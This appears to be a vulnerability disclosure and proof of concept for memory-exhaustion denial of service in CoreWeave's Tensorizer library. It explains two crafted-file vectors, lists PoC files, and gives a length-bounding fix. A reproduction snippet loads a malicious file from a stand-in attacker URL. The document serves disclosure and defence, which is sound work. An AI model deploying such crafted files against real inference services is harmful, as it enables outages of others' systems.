PoC: Tensorizer Uncontrolled Memory Allocation DoS
Vulnerability
CoreWeave's Tensorizer library has two independent uncontrolled memory allocation vectors when loading .tensors files. Both read unsigned 64-bit integers from untrusted file data and use them directly for allocation without any upper bound validation.
Vector 1 - Metadata total_len (serialization.py:841):
A crafted 73-byte file triggers reader.read(18,446,744,073,709,551,615) (~18.4 exabytes)
Vector 2 - Tensor header_len (serialization.py:646):
A crafted 125-byte file triggers bytearray(18,446,744,073,709,551,615) (~18.4 exabytes)
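Both vectors share one root cause: a 64-bit length read from the file is passed straight to an allocation. The fix on the loading side is to bound that length before allocating, against both a caller-chosen ceiling and the bytes the stream actually holds. The helper below is an added illustration of that check, not Tensorizer's own code; the little-endian u64 length prefix, the `read_bounded_blob` name, and the sample byte strings are assumptions constructed for the example and are not the real .tensors layout.

```python
import io
import struct

# Hypothetical helper (not Tensorizer's code). Layout assumption for this
# example only: a little-endian u64 length followed by that many bytes.
U64 = struct.Struct("<Q")


def read_bounded_blob(stream, max_len):
    """Read a length-prefixed blob from untrusted data, refusing declared
    lengths that exceed max_len or the bytes remaining in the stream.

    Nothing is allocated until both checks pass, so an oversized length
    field is rejected instead of turning into a huge read()/bytearray().
    """
    header = stream.read(U64.size)
    if len(header) != U64.size:
        raise ValueError("truncated length prefix")
    (length,) = U64.unpack(header)

    # Check 1: hard ceiling chosen by the caller (e.g. a few MiB for metadata).
    if length > max_len:
        raise ValueError(f"declared length {length} exceeds limit {max_len}")

    # Check 2: for seekable input, the stream must actually contain that many
    # bytes. A 73-byte file cannot legitimately declare an 18 EB field.
    # Non-seekable sources (HTTP bodies) rely on check 1 alone.
    if stream.seekable():
        pos = stream.tell()
        stream.seek(0, io.SEEK_END)
        remaining = stream.tell() - pos
        stream.seek(pos)
        if length > remaining:
            raise ValueError(
                f"declared length {length} exceeds remaining {remaining} bytes"
            )

    data = stream.read(length)
    if len(data) != length:
        raise ValueError("short read")
    return data


# Constructed sample inputs for this example (not real .tensors files).
GOOD = U64.pack(5) + b"hello"          # declares 5 bytes, carries 5 bytes
OVERSIZED = U64.pack(2**64 - 1)        # declares ~18.4 EB, carries nothing


def check(blob, max_len=1 << 20):
    """Return ("ok", data) or ("rejected", reason) for a candidate blob."""
    try:
        return ("ok", read_bounded_blob(io.BytesIO(blob), max_len))
    except ValueError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print(check(GOOD))       # ('ok', b'hello')
    print(check(OVERSIZED))  # ('rejected', 'declared length ... exceeds limit ...')
```

The order of the checks matters: comparing against the caller's ceiling first means a remote, non-seekable source still gets a bound, and the file-size check only adds precision for local files. A loader that applies this to both the metadata length and each per-tensor header length closes both vectors described above.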
Files
- malicious_metadata_dos.tensors: 73-byte file, triggers metadata allocation DoS
- malicious_8gb_dos.tensors: 73-byte file, triggers 8GB metadata allocation
- malicious_header_dos.tensors: 125-byte file, triggers per-tensor header allocation DoS
- create_malicious_tensors.py: Script to generate all PoC files
Reproduction
```python
from tensorizer import TensorDeserializer

# This triggers a MemoryError or OOM kill:
d = TensorDeserializer('malicious_metadata_dos.tensors')

# Also works from remote URL (common production usage):
d = TensorDeserializer('https://attacker.com/malicious.tensors')
```
Impact
- Denial of Service on any ML inference service using Tensorizer
- Remotely triggerable via HTTP/S3 model URLs
- 73-byte payload crashes the process
- Affects CoreWeave's Inference platform and any Tensorizer user
NON-DESTRUCTIVE
These files only cause memory allocation attempts. No code is executed.